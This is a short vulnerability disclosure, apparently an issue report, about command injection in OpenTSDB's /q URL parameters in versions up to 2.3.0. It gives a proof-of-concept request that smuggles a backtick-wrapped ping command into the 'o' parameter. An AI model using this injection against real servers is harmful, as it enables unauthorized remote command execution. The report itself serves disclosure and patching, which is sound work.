Many parameters to the /q URL can execute command, including o, key, style, yrange and its json input, y2range and its json input.

[mikelueng]

url: opentsdb-a.b.com:4242/q?start=x&end=x&m=x&o=&yrange=[0:]&y2range=[0:]&key=x&style=x&wxh=x&json
payload: take 'o' parameter as example
requeset url: opentsdb-a.b.com:4242/q?start=x&end=x&m=x&o=%60ping%20-c%2010%20127.0.0.1%60&yrange=[0:]&y2range=[0:]&key=x&style=x&wxh=x&json
response: show ping infomation.
ps: opentsdb-a.b.com is a host which use opentsdb service.

impact:

1. I have checked the version below 2.3.0, including 2.3.0, 2.2.0, 2.1.4, all are vulnerable. The other versions below 2.3.0 haven't check may probably has the same problem.
2. The latest version of opentsdb(2.3.1) has fixed the vulnerability.

It's very important for users to know this vulnerability, and update the latest version as soon as possible. Don't let your server device in great danger!